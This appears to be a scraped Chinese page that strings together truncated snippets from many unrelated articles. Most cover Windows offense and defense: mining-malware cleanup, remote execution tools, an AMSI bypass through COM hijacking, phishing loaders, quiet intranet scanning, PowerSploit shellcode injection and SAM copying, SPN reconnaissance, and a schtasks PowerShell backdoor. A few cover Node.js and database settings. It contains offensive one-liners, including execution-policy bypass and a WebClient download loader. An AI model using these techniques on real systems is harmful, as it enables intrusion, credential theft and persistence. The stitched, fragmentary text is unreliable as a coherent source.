挖矿病毒还会在本地安全策略中创建一条阻止连接本服务器445号端口的IPSec策略。...中了挖矿病毒的机器会多出个如下截图的类 0079nlvZly4g65waj5rfxj30dg07vjr7.jpg 或者类似这种类 0079nlvZly4g65waj6y1tj30df07ujrq.jpg 3.删除本地安全策略...netbc的IPSec策略 打开本地安全策略,然后定位到安全设置à应用程序控制策略àIP安全策略(默认是空的) 0079nlvZly4g65wajdf8cj30ss0hq75x.jpg 根据之前的处理结果...安全建议 1.系统层面 服务器端: 建立服务器投产标准化规范,安全基线(如:服务器上线之前,安全策略如何设置、补丁要求、防病毒、运维管理要求如何配置等) 定义服务器运维规范,安全要求,以及安全检查机制...建立服务器配置管理机制,首先针对操作系统进行配置管理 客户端: 建立客户端系统准入机制,如没有进行补丁更新、没有安装防病毒的客户端无法访问服务器区网络 定义客户端补丁更新策略、防病毒更新策略等安全要求
PsTools工具之一,在指定的一台或多台计算机上运行应用程序 条件: 需要开放ADMIN$共享 3、WMIC 功能强大,可做系统管理、远程主机信息获取 条件: 启动WMI服务,开放135端口 本地安全策略的...条件: 启动WMI服务,开放135端口 本地安全策略的“网络访问: 本地账户的共享和安全模式”应设为“经典-本地用户以自己的身份验证” 5、powershell remoting 实现在目标主机远程执行程序后...,可对目标主机开放powershell remoting,用作远程连接 条件: 远程连接会有痕迹 本机要开启winRM服务 命令汇总: 列出所有远程信任主机 powershell Get-Item WSMan...* -Force 设置允许运行ps1文件 powershell Set-ExecutionPolicy Unrestricted执行test.ps1文件 powershell -ExecutionPolicy...scheduler关闭,无法使用at、schtasks 3、Windows Management Instrumentation服务关闭,关闭135端口无法使用wmic、wmiexec 4、不支持3389 那么,如何在目标主机远程执行程序
在这篇文章中,我们将阐述一种通过劫持COM服务器来绕过AMSI的方法, 并分析Microsoft如何在build#16232中修复该绕过,然后再讨论如何再次绕过微软对该漏洞的修复。...在进行研究之前,我们需要明白的是:基本上,脚本解释器(如PowerShell)从工作目录加载amsi.dll,而不是从安全路径(如System32)加载它。...和AMSI的CLSID创建一个ProcMon过滤器来验证修补后的amsi.dll版本不再通过注册表查询COM服务器。...当PowerShell启动时,您将注意到没有任何条目出现: 接下来,我们删除易受攻击的AMSI DLL并将PowerShell移动到同一目录。...如您所见,现在正在查询注册表以查找AMSI的COM服务器: 使用易受攻击的AMSI DLL,从图中可以看出我们现在可以执行COM服务器劫持: 总结: 尽管微软在补丁#16232中对该漏洞进行了修复,但仍然可以通过使用旧的
office文档:易于混淆(结合图片模糊之类),但需要手动开宏,进程链可疑 白加黑钓鱼:利用带签名的白程序,通过DLL劫持的方案加载恶意DLL;比较容易过AV,但需要解压执行 LNK文件钓鱼:链接对象是Powershell...加密算法数据还原:base64 (New-Object System.Net.WebClient).DownloadFile(url, file_path); 数据还原引擎 尾部可以追加任意大小的word、PE、PowerShell...DNS SERVER 设置 向DNS server 查询 Domain Name A记录对应地址 nltest 提取域控信息的过程 net dsquery 通过对LDAP进行查询 DC Locator...Process 产生DNS查询,沿用DC Locator的机制很安全 Kerberos认证,KDC GC 查询工具 dsquery/ADSISearcher使用明文的LDAP协议,容易被IDS捕获 定位域控...内某处跳转到恶意代码 修改OEP指向恶意代码 DLL加载 OEP jump 利用TLS(线程局部存储)回调 PE感染 LNK感染 Office感染 公司软件库供应链,类似“驱动人生” 感染远程共享文件 外界设备感染,如U
透明数据加密常用于解决一些安全合规问题,如PCI DSS、等级安全保护等要求静态数据需要被保护的场景。...第一种方式:通过视图脱敏的方案进行操作,如通过查询语句,将指定字段进行字符串处理。...在其他数据库中,对用户的权限管控均在表级别,例如:限制某个用户只能查询某个表。而采用RLS后,不同的用户访问一个表可以看到不同的数据。 默认情况下,表没有任何安全策略限制。...如果表上不存在安全策略,如果没有配置安全策略,所有的数据查询和更新都会禁止,但是对全表进行操作的命令,比如 TRUNCATE 和 REFERENCES 不受影响。...图:安全组配置指南 角色权限访问控制 在大企业中,数据库资源面向不同的业务提供服务,而不同的业务隶属于不同的小组或者部门,此时如何在统一的账号下管理不同的业务资源就成为了安全权限管理的一大难题。
静默内网存活探测 一、前言 临近教育护网,再次来研究一个之前没有细究过的内容:静默内网存活探测,当你突破边界服务器进入内网的时候就会面临着这个问题,如何在不被发现的情况下进行内网探测。...如果使用如fscan等内网自动化探测工具产生大量的异常流量那么就必然会被发现,被发现那十有八九这台好不容易被拿下的服务器肯定就无了,毕竟蓝队最喜欢关机。这篇文章就来探讨如何这个问题。...$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done 2、arp探测 通过arp可以探测出一些信息,也没动静 arp -a 3、PowerShell 使用powershell...脚本进行扫描就需要上传对应的脚本才能进行扫描 powershell.exe ‐exec bypass ‐Command "Import‐Module ..../blob/master/Invoke-TSPingSweep.ps1 4、nbtstat NBTSTAT命令可以用来查询涉及到NetBIOS信息的网络机器。
0x00 过渡 之前提到当在执行powershell脚本时,由于默认策略的缘故,是会报错的,因此也出现了几种逃过的情况: 本地权限绕过:PowerShell.exe -ExecutionPolicy...Persistence 后门脚本(持久性控制) AntivirusBypass 发现杀软查杀特征 Exfiltration 在目标主机上进行信息搜集 Mayhem 蓝屏等破坏性脚本 Privesc 在目标主机中用于提权...5).在powershell中调用invoke-shellcode(可通过help命令来查询具体操作以及例子)。 ?...注意:若此处关闭powershell,那么连接也将终断,因为承载木马的powershell被关闭了。 b.调用invoke-shellcode将shellcode注入到指定的进程中。...b.调用Invoke-NinjaCopy复制一些系统无法复制的文件如sam文件。 1).通过IEX下载并调用Get-NinjaCopy。 正常情况下复制: ?
工具: SetSPN查询: windows系统自带的setspn可以查询域内的SPN #查看当前域内所有的SPN: setspn -Q */* #查看指定域xie.com注册的SPN: setspn...-T xie.com -Q */* setspn -X删除指定SPN 查找指定用户/主机名注册的SPN:setspn -L username/hostname PowerShell-AD-Recon:...\GetUserSPNs.vbs PowerView.ps1: PowerView是 PowerSpolit 中 Recon目录下的一个powershell脚本,PowerView 相对于上面几种是根据不同用户的...其中一些需要PowerShell v2.0的环境,还有一些则需要PowerShell v3.0环境。...#Powershellery/Stable-ish/Get-SPN/ 下Get-SPN.psm1脚本的使用,需要powershell3.0及以上版本才能使用 Import-Module .
如我的路径 C:\Program Files\nodejs 这时候,再回到cmd或者powershell,命令行就可以执行 node 命令了。但是还不能执行使用npm安装的全局包的命令。...如 cnpm,nvm,nrm 等,解决办法如下 1、使用 npm config get prefix 找到npm全局包的安装路径,如我的电脑输出路径为 C:\Users\Administrator\AppData...\Roaming\npm 将这个路径也添加到环境变量 Path 中,重启cmd或powershell命令行工具就可以了。...imageMogr2/auto-orient/strip|imageView2/2/w/979/format/webp) 这是因为windows的安全策略禁用了当前目录下的命令 解决方案如下 1、在系统中...搜索框 输入 PowerShell 或者 右击任务栏的电脑图标,找到 Windows PowerShell(管理员); 2、点击“管理员身份运行”; 3、输入 set-ExecutionPolicy
1、介绍 PowerShell 可以简单的理解为 cmd 的高级版,cmd 能做的事在 PowerShell 中都能做,但 PowerShell 还能做很多 cmd 不能做的事情。...更改执行策略可能会产生安全风险,如 https:/go.microsoft.com/fwlink/?LinkID=135170 中的 about_Execution_Policies 帮助主题所述。...-ExecutionPolicy Bypass (-Exec Bypass) :绕过执行安全策略 -Noexit:执行后不退出Shell,这在使用键盘记录等脚本时非常重要 -NonInteractive...(-Nonl):非交互模式,PowerShell 不为用户提供交互的提示 在 PowerShell 下,命令的命名规范很一致,都采用了动词-名词的形式,如 Net-Item,动词一般为 Add、New...PowerShell 还兼容 cmd 和 Linux 命令,如查看目录可以使用 dir 或者 ls 。
---- 1、信息收集 攻击者在获取webshell权限后,会尝试查询当前用户权限,收集系统版本和补丁信息,用来辅助权限提升。...关键进程跟踪事件和说明,如: 4688 创建新进程 4689 进程终止 ?...mstsc /v 10.1.1.188 Windows日志分析: 在本地安全策略中,需开启审核登录事件,关键登录事件和说明,如: 4624 登录成功 4625 登录失败 ?...通过创建计划任务执行脚本后门,以便下次直接进入,使用以下命令可以一键实现: schtasks /create /sc minute /mo 1 /tn "Security Script" /tr "powershell.exe...,需开启审核对象访问,关键对象访问事件,如: 4698 创建计划任务 4699 删除计划任务 ?
DBA可以使用的工具很多,对于SQL Server来说,有查询分析器、事件探查器、命令行工具等,其中SQL语句是重中之重,但是PowerShell的出现使得DBA又多了一种选择。...SQL Server 2008 引入了对于 Windows PowerShell 的支持。...然后,可以使用您熟悉的命令(如 cd 和 dir),按照在命令提示符窗口中定位文件夹的方式浏览路径。可以使用其他命令(如 ren 或 del)针对路径中的节点执行操作。...一组 cmdlet(它们在 Windows PowerShell 脚本中用于指定 SQL Server 操作)。...SQL Server cmdlet 支持各种操作,如运行包含 Transact-SQL 或 XQuery 语句的 sqlcmd 脚本。
乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经授权,不得用于其他。...windows 10 64位 未测 ❌ 未测 windows server 2019 64位 ✔️ 未测 ❌ ps:以上环境都联网,且均在cmd中执行-ExecutionPolicy Bypass来绕过执行安全策略进行上线...\1.ps1 这里是在cmd命令行下执行PowerShell命令的 -ExecutionPolicy Bypass:绕过执行安全策略,在默认情况下,PowerShell的安全策略规定了PowerShell...在渗透测试中,基本每一次运行PowerShell脚本时都要使用这个参数。...windows Defender msfvenom生成powershell攻击脚本和Invoke-Obfuscation混淆方法在Encoding模式下的静态查杀效果: ? ?
本文将探讨如何通过PowerShell和其他Windows工具管理用户账户,包括查看和设置密码策略、检查用户状态,以及导出和导入安全策略。...导出和导入安全策略 将安全策略从一个Windows系统导入到另一个系统是同步环境设置的有效方法。...检查本地用户的状态 使用PowerShell的Get-LocalUser命令,管理员可以查看本地用户的状态,包括账户是否启用、是否过期等信息。...例如,通过以下命令获取详细信息并以JSON格式输出: powershell Get-LocalUser | ConvertTo-Json 这为管理员提供了一种灵活的方式来监控和报告系统中用户账户的状态...管理员可以使用PowerShell来检查账户是否被锁定,并进行解锁操作: powershell $User = Get-LocalUser -Name "username" if ($User.AccountLockoutTime
开始我们的PowerShell之旅 a) 打开PowerShell >使用鼠标打开 >使用键盘打开 b) 来来来,试试Hello World 第一个管道操作符 | 第二个符号条件查询 ?...我为什么要写PowerShell? 其实没有太多原因,本人平生所学驳杂,但是无一专精,实在惭愧。但是PowerShell又是自己在平时日常工作中用的最多的一种脚本语言,所以就选他了。...相当于命令 where-object 设置查询条件 $_ 自动变量 -eq 比较运算符 第一个管道操作符 | 这个管道操作符可以说简直是PowerShell的艺术魅力所在。...第二个符号条件查询 ? ? – 实际上他是 where-object 的别名,就是为了图方便。当然你也可以把它设置成其它符号,但是建议不要有这样的骚操作。...如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
双击其右边的“启动”选项,打开“启动属性”窗口: 操作系统启动时自动运行该脚本,使用net user命令查看未发现hacker用户,但通过net user hacker查看该用户时发现它确实存在: 但在本地安全策略中可看到...某些操作不能对其作用,如 cd,dir等 ,但可以 copy 文件进去,或者直接查看文件 创建目录:md test....\ 删除目录:rd /s /q test....\ 利用系统保留的文件名创建无法删除的...查询服务状态:sc qc xlkfs 2. 停止服务:net stop xlkfs(停止后,文件便会显现出来,cmd能见) 3. 删除服务:sc delete xlkfs 4....SCHTASKS /parameter [arguments] 描述: 允许管理员创建、删除、查询、更改、运行和中止本地或远程系统上的计划任 务。参数列表: /Create 创建新计划任务。...示例 schtasks /create /tn/tr /sc 如 o 创建计划任务启动notepad(需要管理员权限) 对应的可以在 _Task Scheduler
最大的例外是,如果PowerShell脚本文件刚好位于你的系统目录中,那么在命令提示符后直接键入脚本文件名即可运行,如 ....,都采用“动词-名词”的形式,如New-Item,动词部分一般为Add、New、Get、Remove、Set等,命名的别名一般兼容Windows Command和Linux Shell,如Get-ChildItem...ExecutionPolicy Bypass:绕过执行安全策略,这个参数非常重要,在默认情况下,PowerShell的安全策略规定了PowerShell不允许运行命令和文件。...,这是就可以使用上述方法绕过安全策略,运行PowerShell脚本如下图所示。...service apache2 start 在本地浏览器中用IP地址访问,证明我们的Apache服务器设置成果。
最大的例外是,如果PowerShell脚本文件刚好位于你的系统目录中,那么在命令提示符后直接键入脚本文件名即可运行,如 ....-名词”的形式,如New-Item,动词部分一般为Add、New、Get、Remove、Set等,命名的别名一般兼容Windows Command和Linux Shell,如Get-ChildItem命令使用...ExecutionPolicy Bypass:绕过执行安全策略,这个参数非常重要,在默认情况下,PowerShell的安全策略规定了PowerShell不允许运行命令和文件。...,这是就可以使用上述方法绕过安全策略,运行PowerShell脚本如下图所示。...service apache2 start 在本地浏览器中用IP地址访问,证明我们的Apache服务器设置成果。
可使用Win+R键,打开对话窗口,输入cmd指令,然后在Windows自带的cmd.exe对话窗口输入:nvcc --version进行查询,如下图所示。...如白框所示,该电脑的cuda版本为:10.1。 找到,使用qq账号登录,如下图所示。 选择下载历史版本的cudnn,如下图所示。...这里可以打开Anaconda Prompt操作框,输入以下指令: conda info --envs 即可查询到对应的conda环境的文件夹位置信息,如下图所示。...④如何在不同的Windows主机上迁移配置好的conda环境?...输入命令Set-ExecutionPolicy RemoteSigned,在出现选项后输入Y回车,更改PowerShell的安全策略。1.
调试权限是一种安全策略设置,允许用户将调试器附加到进程或内核。管理员可以修改用户组的安全策略以包含或删除此功能。正在调试自己的应用程序的开发人员不需要此用户权限。...本地安全策略是默认给管理员组权限的 ? 在组策略里面也是把调试程序这个权限给了管理员。...WDigest即摘要身份验证,摘要身份验证是一种质询/响应协议,主要在 Windows Server 2003 中用于 LDAP 和基于 Web 的身份验证。...因为某些系统服务(如IIS的SSO身份认证)就需要用到WDigest Auth,所以这里微软选择了一个折中的方法,让用户选择是否关闭WDigest Auth,安装补丁之后可以自己选择是否开启WDigest...这里使用powershell脚本运行脚本,可以看到在没有修改的情况下是10s刷新一次 powershell.exe -ExecutionPolicy Bypass -File test.ps1 ?
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
云直播
对象存储
实时音视频
